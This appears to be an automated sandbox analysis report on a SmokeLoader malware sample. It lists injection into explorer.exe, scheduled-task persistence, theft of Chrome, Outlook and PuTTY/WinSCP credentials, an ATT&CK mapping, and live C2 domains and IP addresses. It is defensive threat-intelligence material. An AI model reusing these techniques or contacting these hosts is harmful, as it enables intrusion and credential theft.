Source: C:\Windows\SysWOW64\explorer.exe Code function: 28_2_027DE09A RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_02E82304 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_02E81000 GetProcessHeap,RtlAllocateHeap,
Source: C:\Users\user\Desktop\1RMZ62tUAl.exe Code function: 1_2_021ED8D7 push dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\1RMZ62tUAl.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\favdejf Process queried: DebugPort
Source: C:\Windows\SysWOW64\explorer.exe Code function: 22_2_00111E98 CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 28_2_027D8D3B SetUnhandledExceptionFilter,UnhandledExceptionFilter,

            HIPS / PFW / Operating System Protection Evasion:

            Benign windows process drops PE files
            Source: C:\Windows\explorer.exe | File created: favdejf.6.dr
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\SysWOW64\explorer.exe | Network Connect: 5.188.88.118 80
            Source: C:\Windows\SysWOW64\explorer.exe | Domain query: rsuehfidvdkfvk.top
            Source: C:\Windows\explorer.exe | Domain query: iosoftware.org
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\1RMZ62tUAl.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Users\user\Desktop\1RMZ62tUAl.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
            Source: C:\Users\user\AppData\Roaming\favdejf | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Users\user\AppData\Roaming\favdejf | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
            Creates a thread in another existing process (thread injection)
            Source: C:\Users\user\Desktop\1RMZ62tUAl.exe | Thread created: C:\Windows\explorer.exe EIP: 4DE1930
            Source: C:\Users\user\AppData\Roaming\favdejf | Thread created: unknown EIP: 4EC1930
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: CreateToolhelp32Snapshot,Process32First,lstrcmpi,Process32Next,CloseHandle, explorer.exe
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,FindCloseChangeNotification,Sleep, explorer.exe
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,FindCloseChangeNotification,Sleep, explorer.exe
            Source: explorer.exe, 00000006.00000000.342990113.0000000000B68000.00000004.00000020.sdmp | Binary or memory string: Progman\Pr
            Source: explorer.exe, 00000006.00000000.312286247.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000002.562776985.0000000003050000.00000002.00020000.sdmp, explorer.exe, 00000016.00000002.562911220.0000000002ED0000.00000002.00020000.sdmp, explorer.exe, 00000017.00000002.556994442.0000000000C70000.00000002.00020000.sdmp, explorer.exe, 00000018.00000002.562677135.0000000003220000.00000002.00020000.sdmp, explorer.exe, 00000019.00000002.557849351.0000000001750000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000002.561545851.0000000003160000.00000002.00020000.sdmp, explorer.exe, 0000001B.00000002.557928064.0000000000E10000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000002.564628449.00000000032E0000.00000002.00020000.sdmp, explorer.exe, 0000001D.00000002.562791958.00000000032A0000.00000002.00020000.sdmp, explorer.exe, 0000001E.00000002.557784723.00000000019E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000002.563078612.00000000031A0000.00000002.00020000.sdmp | Binary or memory string: Program Manager
            Source: explorer.exe, 00000006.00000000.314997894.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 00000015.00000002.562776985.0000000003050000.00000002.00020000.sdmp, explorer.exe, 00000016.00000002.562911220.0000000002ED0000.00000002.00020000.sdmp, explorer.exe, 00000017.00000002.556994442.0000000000C70000.00000002.00020000.sdmp, explorer.exe, 00000018.00000002.562677135.0000000003220000.00000002.00020000.sdmp, explorer.exe, 00000019.00000002.557849351.0000000001750000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000002.561545851.0000000003160000.00000002.00020000.sdmp, explorer.exe, 0000001B.00000002.557928064.0000000000E10000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000002.564628449.00000000032E0000.00000002.00020000.sdmp, explorer.exe, 0000001D.00000002.562791958.00000000032A0000.00000002.00020000.sdmp, explorer.exe, 0000001E.00000002.557784723.00000000019E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000002.563078612.00000000031A0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000006.00000000.312286247.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000002.562776985.0000000003050000.00000002.00020000.sdmp, explorer.exe, 00000016.00000002.562911220.0000000002ED0000.00000002.00020000.sdmp, explorer.exe, 00000017.00000002.556994442.0000000000C70000.00000002.00020000.sdmp, explorer.exe, 00000018.00000002.562677135.0000000003220000.00000002.00020000.sdmp, explorer.exe, 00000019.00000002.557849351.0000000001750000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000002.561545851.0000000003160000.00000002.00020000.sdmp, explorer.exe, 0000001B.00000002.557928064.0000000000E10000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000002.564628449.00000000032E0000.00000002.00020000.sdmp, explorer.exe, 0000001D.00000002.562791958.00000000032A0000.00000002.00020000.sdmp, explorer.exe, 0000001E.00000002.557784723.00000000019E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000002.563078612.00000000031A0000.00000002.00020000.sdmp | Binary or memory string: Progman
            Source: explorer.exe, 00000006.00000000.312286247.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000002.562776985.0000000003050000.00000002.00020000.sdmp, explorer.exe, 00000016.00000002.562911220.0000000002ED0000.00000002.00020000.sdmp, explorer.exe, 00000017.00000002.556994442.0000000000C70000.00000002.00020000.sdmp, explorer.exe, 00000018.00000002.562677135.0000000003220000.00000002.00020000.sdmp, explorer.exe, 00000019.00000002.557849351.0000000001750000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000002.561545851.0000000003160000.00000002.00020000.sdmp, explorer.exe, 0000001B.00000002.557928064.0000000000E10000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000002.564628449.00000000032E0000.00000002.00020000.sdmp, explorer.exe, 0000001D.00000002.562791958.00000000032A0000.00000002.00020000.sdmp, explorer.exe, 0000001E.00000002.557784723.00000000019E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000002.563078612.00000000031A0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
            Source: explorer.exe, 00000006.00000000.322637021.0000000008778000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWndh
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_02ED518B cpuid
            Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_02E8227E GetSystemTimeAsFileTime,_alldiv,wsprintfA,
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_02E82304 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,

            Stealing of Sensitive Information:

            Yara detected SmokeLoader
            Source: Yara match | File source: 0000000A.00000002.424469148.0000000003C21000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000000.345433901.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.357733391.0000000002160000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.424450951.0000000003C00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.357762865.0000000002181000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000018.00000002.559721619.00000000027D1000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000016.00000002.555611191.0000000000111000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000017.00000002.555126531.0000000000311000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000019.00000002.555346763.0000000000E91000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 5056, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 3532, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 6052, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 6908, type: MEMORYSTR
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Windows\SysWOW64\explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies-journal
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal

            Remote Access Functionality:

            Yara detected SmokeLoader
            Source: Yara match | File source: 0000000A.00000002.424469148.0000000003C21000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000000.345433901.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.357733391.0000000002160000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.424450951.0000000003C00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.357762865.0000000002181000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000018.00000002.559721619.00000000027D1000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000016.00000002.555611191.0000000000111000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000017.00000002.555126531.0000000000311000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000019.00000002.555346763.0000000000E91000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 5056, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 3532, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 6052, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 6908, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Native API1 | DLL Side-Loading1 | DLL Side-Loading1 | Deobfuscate/Decode Files or Information1 | OS Credential Dumping1 | System Time Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot1
            Default Accounts | Exploitation for Client Execution1 | Application Shimming1 | Application Shimming1 | Obfuscated Files or Information3 | Input Capture21 | File and Directory Discovery4 | Remote Desktop Protocol | Data from Local System1 | Exfiltration Over Bluetooth | Encrypted Channel2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | Command and Scripting Interpreter2 | Create Account1 | Process Injection313 | Software Packing11 | Credentials in Registry1 | System Information Discovery17 | SMB/Windows Admin Shares | Email Collection1 | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | DLL Side-Loading1 | NTDS | Security Software Discovery551 | Distributed Component Object Model | Input Capture21 | Scheduled Transfer | Application Layer Protocol113 | SIM Card Swap | | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | File Deletion1 | LSA Secrets | Virtualization/Sandbox Evasion12 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading11 | Cached Domain Credentials | Process Discovery13 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion12 | DCSync | Application Window Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection313 | Proc Filesystem | Remote System Discovery1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
            Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Hidden Files and Directories1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

            Behavior Graph

            Behavior Graph ID: 524302 | Sample: 1RMZ62tUAl.exe | Startdate: 18/11/2021 | Architecture: WINDOWS | Score: 100

            Start node signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Multi AV Scanner detection for submitted file; 4 other signatures

            1RMZ62tUAl.exe (started)
            Signatures: Detected unpacking (changes PE section rights); Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process; Creates a thread in another existing process (thread injection)
            Injects into: explorer.exe

            favdejf (started)
            Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Checks if the current machine is a virtual machine (disk enumeration)

            explorer.exe (injected)
            DNS/IP: rsuehfidvdkfvk.top 5.188.88.118, 49749, 49750, 49751, PINDC-ASRU, Russian Federation; iosoftware.org 139.60.161.75, 80, HOSTKEY-USAUS, United States
            Dropped: C:\Users\user\AppData\Roaming\favdejf (PE32); C:\Users\user\...\favdejf:Zone.Identifier (ASCII)
            Signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Deletes itself after installation; Hides that the sample has been downloaded from the Internet (zone.identifier)
            Starts: explorer.exe; explorer.exe; explorer.exe; 10 other processes

            explorer.exe (started by injected explorer.exe)
            DNS/IP: rsuehfidvdkfvk.top
            Signatures: System process connects to network (likely due to code injection or exploit); Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); 3 other signatures

            Screenshots

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label
            1RMZ62tUAl.exe | 47% | Virustotal |
            1RMZ62tUAl.exe | 100% | Joe Sandbox ML |

            Dropped Files

            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Roaming\favdejf | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Roaming\favdejf | 56% | ReversingLabs | Win32.Trojan.Babar

            Unpacked PE Files

            Source | Detection | Scanner | Label
            1.3.1RMZ62tUAl.exe.2150000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            10.2.favdejf.2000e50.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            1.2.1RMZ62tUAl.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            10.3.favdejf.3c00000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            1.2.1RMZ62tUAl.exe.2140e50.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            10.2.favdejf.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

            Domains

            Source | Detection | Scanner | Label
            rsuehfidvdkfvk.top | 2% | Virustotal |
            iosoftware.org | 11% | Virustotal |

            URLs

            Source | Detection | Scanner | Label
            http://rsuehfidvdkfvk.top/Mozilla/5.0 | 0% | Avira URL Cloud | safe
            http://rsuehfidvdkfvk.top/application/x-www-form-urlencodedMozilla/5.0 | 0% | Avira URL Cloud | safe
            http://rsuehfidvdkfvk.top/ | 0% | Avira URL Cloud | safe
            http://rsuehfidvdkfvk.top/: | 0% | Avira URL Cloud | safe

            Domains and IPs

            Contacted Domains

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            rsuehfidvdkfvk.top | 5.188.88.118 | true | true | | unknown
            iosoftware.org | 139.60.161.75 | true | true | | unknown

            Contacted URLs

            Name | Malicious | Antivirus Detection | Reputation
            http://rsuehfidvdkfvk.top/ | true | Avira URL Cloud: safe | unknown

            URLs from Memory and Binaries

            Name | Source | Malicious | Antivirus Detection | Reputation
            http://rsuehfidvdkfvk.top/Mozilla/5.0 | explorer.exe, 00000014.00000002.482205642.00000000011F0000.00000004.00000020.sdmp, explorer.exe, 00000015.00000002.561502388.0000000002BA8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000002.562589266.0000000002BD8000.00000004.00000020.sdmp, explorer.exe, 00000017.00000002.555930517.00000000007E0000.00000004.00000020.sdmp, explorer.exe, 00000018.00000000.500674063.00000000027E0000.00000040.00020000.sdmp, explorer.exe, 00000019.00000000.505280148.0000000000EA0000.00000040.00020000.sdmp, explorer.exe, 00000019.00000002.555816764.0000000000EE8000.00000004.00000020.sdmp, explorer.exe, 0000001A.00000000.511253478.0000000000340000.00000040.00020000.sdmp, explorer.exe, 0000001B.00000002.555867484.0000000000760000.00000004.00000020.sdmp, explorer.exe, 0000001B.00000000.516205138.0000000000600000.00000040.00020000.sdmp, explorer.exe, 0000001D.00000000.525714592.00000000027E0000.00000040.00020000.sdmp, explorer.exe, 0000001E.00000002.555950745.0000000001376000.00000004.00000020.sdmp, explorer.exe, 0000001E.00000000.530597579.0000000001290000.00000040.00020000.sdmp, explorer.exe, 0000001F.00000002.561863769.0000000002CC8000.00000004.00000020.sdmp, explorer.exe, 0000001F.00000000.535523393.00000000027E0000.00000040.00020000.sdmp | false | Avira URL Cloud: safe | unknown
            http://rsuehfidvdkfvk.top/application/x-www-form-urlencodedMozilla/5.0 | explorer.exe, 00000013.00000002.485190294.0000000003294000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
            http://rsuehfidvdkfvk.top/: | explorer.exe, 00000013.00000002.485190294.0000000003294000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown

            Contacted IPs

            Public

            IP | Domain | Country | ASN | ASN Name | Malicious
            5.188.88.118 | rsuehfidvdkfvk.top | Russian Federation | 34665 | PINDC-ASRU | true
            139.60.161.75 | iosoftware.org | United States | 395839 | HOSTKEY-USAUS | true

            General Information

            Joe Sandbox Version: 34.0.0 Boulder Opal
            Analysis ID: 524302
            Start date: 18.11.2021
            Start time: 10:42:48
            Joe Sandbox Product: CloudBasic
            Overall analysis duration: 0h 9m 30s
            Hypervisor based Inspection enabled: false
            Report type: light
            Sample file name: 1RMZ62tUAl.exe
            Cookbook file name: default.jbs
            Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of new started processes analysed: 33
            Number of new started drivers analysed: 0
            Number of existing processes analysed: 0
            Number of existing drivers analysed: 0
            Number of injected processes analysed: 1
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode: default
            Analysis stop reason: Timeout
            Detection: MAL
            Classification: mal100.bank.troj.spyw.evad.winEXE@15/6@7/2
            EGA Information: Failed
            HDC Information:
            • Successful, ratio: 18.5% (good quality ratio 7.9%)
            • Quality average: 29.9%
            • Quality standard deviation: 36.6%
            HCA Information:
            • Successful, ratio: 82%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .exe
            Warnings:
            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
            • TCP Packets have been reduced to 100
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
            • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
            • Not all processes were analyzed; report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtOpenFile calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            Time | Type | Description
            10:44:30 | Task Scheduler | Run new task: Firefox Default Browser Agent 2E48D3EE74E86FF4 path: C:\Users\user\AppData\Roaming\favdejf
            10:45:15 | API Interceptor | 1x Sleep call for process: explorer.exe modified

            Joe Sandbox View / Context

            IPs

            Match | Associated Sample Name / URL | Detection | Context
            5.188.88.118 | 4B32N61SUN.exe | malicious | rsuehfidvdkfvk.top/
            5.188.88.118 | umpa0fYSwl.exe | malicious | rsuehfidvdkfvk.top/
            139.60.161.75 | 4B32N61SUN.exe | malicious | iosoftware.org/system86.exe
            139.60.161.75 | umpa0fYSwl.exe | malicious | iosoftware.org/system86.exe
            139.60.161.75 | v0VaFGKpQR.exe | malicious | iosoftware.org/system86.exe
            139.60.161.75 | Yob73TQCPI.exe | malicious | iosoftware.org/system86.exe

            Domains

            Match | Associated Sample Name / URL | Detection | Context
            rsuehfidvdkfvk.top | 4B32N61SUN.exe | malicious | 5.188.88.118
            rsuehfidvdkfvk.top | umpa0fYSwl.exe | malicious | 5.188.88.118
            rsuehfidvdkfvk.top | v0VaFGKpQR.exe | malicious | 8.209.67.58
            rsuehfidvdkfvk.top | Yob73TQCPI.exe | malicious | 8.209.67.58
            iosoftware.org | 4B32N61SUN.exe | malicious | 139.60.161.75
            iosoftware.org | umpa0fYSwl.exe | malicious | 139.60.161.75
            iosoftware.org | v0VaFGKpQR.exe | malicious | 139.60.161.75
            iosoftware.org | Yob73TQCPI.exe | malicious | 139.60.161.75
            iosoftware.org | GwGRsPZJO7.exe | malicious | 139.60.161.75
            iosoftware.org | GhlYvtlwHA.exe | malicious | 139.60.161.75
            iosoftware.org | WSWw3rqaqL.exe | malicious | 139.60.161.75

            ASN

            Match | Associated Sample Name / URL | Detection | Context
            PINDC-ASRU | 4B32N61SUN.exe | malicious | 5.188.88.118
            PINDC-ASRU | umpa0fYSwl.exe | malicious | 5.188.88.118
            PINDC-ASRU | Nov_SOA_MT103.xlsx | malicious | 91.240.242.111
            PINDC-ASRU | triage_dropped_file.exe | malicious | 91.240.242.111
            PINDC-ASRU | Gno6CluFsB.exe | malicious | 91.240.242.111
            PINDC-ASRU | QUOTATION REQUEST document file 465.exe | malicious | 91.240.242.111
            PINDC-ASRU | Zo7DiD3qYT.exe | malicious | 91.240.242.111
            PINDC-ASRU | s20KNIIaif.exe | malicious | 91.240.242.111
            PINDC-ASRU | fXvJwoVvee.exe | malicious | 91.240.242.111
            PINDC-ASRU | DVv7dqTcMg.exe | malicious | 91.240.242.111
            PINDC-ASRU | Quotation Forms_MV YU FENG4 TRADER.xlsx | malicious | 91.240.242.111
            PINDC-ASRU | Quotation form MV YU FENG4 TRADER.xlsx | malicious | 91.240.242.111
            PINDC-ASRU | MV Glorious Sea.xlsx | malicious | 91.240.242.111
            PINDC-ASRU | Requisition for spare parts1.xlsx | malicious | 91.240.242.111
            PINDC-ASRU | AWsh7ps5RC.exe | malicious | 91.240.242.111
            PINDC-ASRU | IxG7d9No5Q.exe | malicious | 5.188.88.190
            PINDC-ASRU | AyAj5GJqIg.exe | malicious | 5.188.88.203
            PINDC-ASRU | Md0q201V1D.exe | malicious | 5.188.88.203
            PINDC-ASRU | yj2Lz2zdxp.exe | malicious | 5.188.88.203
            PINDC-ASRU | y1JBw0eea5.exe | malicious | 5.188.88.203
            HOSTKEY-USAUS | 4B32N61SUN.exe | malicious | 139.60.161.75
            HOSTKEY-USAUS | umpa0fYSwl.exe | malicious | 139.60.161.75
            HOSTKEY-USAUS | v0VaFGKpQR.exe | malicious | 139.60.161.75
            HOSTKEY-USAUS | Yob73TQCPI.exe | malicious | 139.60.161.75
            HOSTKEY-USAUS | rMVpcZ73UK.exe | malicious | 139.60.160.200
            HOSTKEY-USAUS | 8Jem3WHfr1.exe | malicious | 139.60.160.200
            HOSTKEY-USAUS | 3Pmz7pGNI6.exe | malicious | 139.60.160.200
            HOSTKEY-USAUS | 2kozcBdouI.exe | malicious | 139.60.160.200
            HOSTKEY-USAUS | j8Ng2Kt6YP.exe | malicious | 139.60.160.200
            HOSTKEY-USAUS | trz51D4.exe | malicious | 139.60.161.68
            HOSTKEY-USAUS | trz51D4.exe | malicious | 139.60.161.68
            HOSTKEY-USAUS | mixazed.exe | malicious | 139.60.161.63
            HOSTKEY-USAUS | service4.exe | malicious | 139.60.161.68
            HOSTKEY-USAUS | service4.exe | malicious | 139.60.161.68
            HOSTKEY-USAUS | file.dll | malicious | 139.60.161.99
            HOSTKEY-USAUS | o7w2HSi17V.exe | malicious | 139.60.163.56
            HOSTKEY-USAUS | trz51D4.exe | malicious | 139.60.161.68
            HOSTKEY-USAUS | trz51D4.exe | malicious | 139.60.161.68
            HOSTKEY-USAUS | evil.doc | malicious | 139.60.161.74
            HOSTKEY-USAUS | evil.doc | malicious | 139.60.161.74

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Temp\6128.tmp
            Process: C:\Windows\SysWOW64\explorer.exe
            File Type: SQLite 3.x database, last written using SQLite version 3032001
            Category: dropped
            Size (bytes): 40960
            Entropy (8bit): 0.792852251086831
            Encrypted: false
            SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
            MD5: 81DB1710BB13DA3343FC0DF9F00BE49F
            SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB
            SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
            SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
            Malicious: false
            Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Local\Temp\6476.tmp
            Process: C:\Windows\SysWOW64\explorer.exe
            File Type: SQLite 3.x database, last written using SQLite version 3032001
            Category: dropped
            Size (bytes): 20480
            Entropy (8bit): 0.6970840431455908
            Encrypted: false
            SSDEEP: 24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
            MD5: 00681D89EDDB6AD25E6F4BD2E66C61C6
            SHA1: 14B2FBFB460816155190377BBC66AB5D2A15F7AB
            SHA-256: 8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
            SHA-512: 159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
            Malicious: false
            Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Local\Temp\6708.tmp
            Process: C:\Windows\SysWOW64\explorer.exe
            File Type: SQLite 3.x database, last written using SQLite version 3032001
            Category: dropped
            Size (bytes): 20480
            Entropy (8bit): 0.5110032006906435
            Encrypted: false
